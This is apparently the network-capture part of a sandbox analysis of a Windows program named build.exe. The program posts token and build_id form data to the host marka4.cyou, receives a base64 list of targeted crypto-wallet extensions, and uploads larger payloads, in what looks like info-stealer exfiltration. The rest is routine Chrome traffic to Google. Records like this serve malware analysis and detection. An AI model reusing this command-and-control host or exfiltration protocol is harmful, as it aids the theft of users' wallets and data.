2025-01-11 22:00:05 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----srq9hlxlfcbaiek6ppph User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:05 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 73 72 71 39 68 6c 78 6c 66 63 62 61 69 65 6b 36 70 70 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 73 72 71 39 68 6c 78 6c 66 63 62 61 69 65 6b 36 70 70 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 73 72 71 39 68 6c 78 6c 66 63 62 61 69 65 6b 36 70 70 70 68 0d 0a 43 6f 6e 74 Data Ascii: ------srq9hlxlfcbaiek6ppphContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------srq9hlxlfcbaiek6ppphContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------srq9hlxlfcbaiek6ppphCont
2025-01-11 22:00:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:06 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:07 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----phlnohdjeua1nyu3ohln User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 6145 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:07 UTC	6145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 68 6c 6e 6f 68 64 6a 65 75 61 31 6e 79 75 33 6f 68 6c 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 6e 6f 68 64 6a 65 75 61 31 6e 79 75 33 6f 68 6c 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 6e 6f 68 64 6a 65 75 61 31 6e 79 75 33 6f 68 6c 6e 0d 0a 43 6f 6e 74 Data Ascii: ------phlnohdjeua1nyu3ohlnContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------phlnohdjeua1nyu3ohlnContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------phlnohdjeua1nyu3ohlnCont
2025-01-11 22:00:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:08 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:08 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----phlnohdjeua1nyu3ohln User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:08 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 68 6c 6e 6f 68 64 6a 65 75 61 31 6e 79 75 33 6f 68 6c 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 6e 6f 68 64 6a 65 75 61 31 6e 79 75 33 6f 68 6c 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 6e 6f 68 64 6a 65 75 61 31 6e 79 75 33 6f 68 6c 6e 0d 0a 43 6f 6e 74 Data Ascii: ------phlnohdjeua1nyu3ohlnContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------phlnohdjeua1nyu3ohlnContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------phlnohdjeua1nyu3ohlnCont
2025-01-11 22:00:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:09 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49741	142.250.184.196	443	4076	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:11 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-11 22:00:11 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 22:00:11 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-KsVdXb5NsRoIrGAYaIoo0A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-11 22:00:11 UTC	124	IN	Data Raw: 64 30 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 65 73 6c 61 20 6d 6f 64 65 6c 20 79 20 6a 75 6e 69 70 65 72 22 2c 22 72 6f 63 6b 73 74 61 72 20 67 61 6d 65 73 20 67 74 61 20 36 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 6c 61 20 73 74 72 6f 6e 67 20 73 68 69 72 74 73 22 2c 22 64 69 6e 6f 73 61 75 72 22 2c 22 66 69 6e 61 6c 20 6a 65 6f 70 61 72 64 79 20 74 6f 64 Data Ascii: d00)]}'["",["tesla model y juniper","rockstar games gta 6 release date","la strong shirts","dinosaur","final jeopardy tod
2025-01-11 22:00:11 UTC	1390	IN	Data Raw: 61 79 22 2c 22 69 72 73 20 74 61 78 20 72 65 74 75 72 6e 73 22 2c 22 67 6f 72 64 6f 6e 20 62 72 6f 74 68 65 72 73 20 62 69 67 20 6c 6f 74 73 22 2c 22 6e 61 73 68 76 69 6c 6c 65 20 77 65 61 74 68 65 72 20 73 6e 6f 77 20 66 6f 72 65 63 61 73 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b 22 7a 6c 22 3a 31 Data Ascii: ay","irs tax returns","gordon brothers big lots","nashville weather snow forecast"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":1
2025-01-11 22:00:11 UTC	1390	IN	Data Raw: 57 74 33 56 6e 52 47 56 56 52 35 56 54 68 46 4f 45 78 36 55 6d 6b 33 65 48 46 33 4d 55 74 51 59 32 4e 71 51 6b 4a 57 59 6b 67 32 55 69 74 7a 56 57 56 54 53 32 68 35 51 33 42 54 59 6b 78 7a 63 32 31 74 62 56 4e 51 4e 6e 46 6f 56 6c 70 70 59 6c 68 45 62 54 45 33 4c 7a 4e 69 5a 7a 64 48 4d 6e 63 79 64 7a 5a 35 5a 6b 38 32 64 58 56 78 64 45 30 78 52 31 6c 78 59 56 4a 55 4d 48 42 49 57 56 68 31 63 6b 56 4f 5a 58 63 79 64 57 56 42 59 6d 4e 49 4f 47 52 46 65 56 46 74 61 6b 78 34 57 6c 52 54 54 33 46 6f 61 6a 42 73 4b 79 74 6a 62 30 4e 69 57 56 49 31 61 6d 34 35 59 6c 49 78 63 32 46 75 53 6c 68 6a 62 47 6c 35 62 55 34 79 62 55 52 44 65 45 70 61 55 33 5a 47 61 55 34 35 64 6c 68 47 61 48 42 6c 61 45 4a 73 52 55 52 57 52 58 42 54 53 56 4a 4c 51 30 68 69 59 6d 70 71 Data Ascii: Wt3VnRGVVR5VThFOEx6Umk3eHF3MUtQY2NqQkJWYkg2UitzVWVTS2h5Q3BTYkxzc21tbVNQNnFoVlppYlhEbTE3LzNiZzdHMncydzZ5Zk82dXVxdE0xR1lxYVJUMHBIWVh1ckVOZXcydWVBYmNIOGRFeVFtakx4WlRTT3FoajBsKytjb0NiWVI1am45YlIxc2FuSlhjbGl5bU4ybURDeEpaU3ZGaU45dlhGaHBlaEJsRURWRXBTSVJLQ0hiYmpq
2025-01-11 22:00:11 UTC	431	IN	Data Raw: 33 63 32 6c 35 63 45 31 48 52 44 41 30 61 32 70 4b 65 6b 31 7a 64 6c 52 70 64 33 52 42 5a 30 45 33 55 57 64 61 54 6e 41 4e 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 22 34 37 36 33 36 32 34 33 34 33 33 38 33 38 30 31 31 32 30 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 2c 39 30 34 2c 39 30 33 2c 39 30 32 2c 39 30 31 2c 39 30 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c Data Ascii: 3c2l5cE1HRDA0a2pKek1zdlRpd3RBZ0E3UWdaTnAN","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"4763624343383801120","google:suggestrelevance":[1252,1251,1250,904,903,902,901,900],"google:suggestsubtypes":[[3,143,362],
2025-01-11 22:00:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49742	142.250.184.196	443	4076	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:11 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-11 22:00:11 UTC	1018	IN	HTTP/1.1 200 OK Version: 713742394 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 11 Jan 2025 22:00:11 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-11 22:00:11 UTC	372	IN	Data Raw: 32 32 31 38 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2218)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2025-01-11 22:00:11 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2025-01-11 22:00:11 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2025-01-11 22:00:11 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2025-01-11 22:00:11 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2025-01-11 22:00:11 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 30 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700320,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){va
2025-01-11 22:00:11 UTC	1390	IN	Data Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4b 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4a 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4c 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4d 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Kd\u003dfunction(a){return new _.Jd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Ld\u003dglobalThis.trustedTypes;_.Md\u003dclass{constructor
2025-01-11 22:00:11 UTC	24	IN	Data Raw: 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 0d 0a Data Ascii: rn a.i;throw Error(\"F
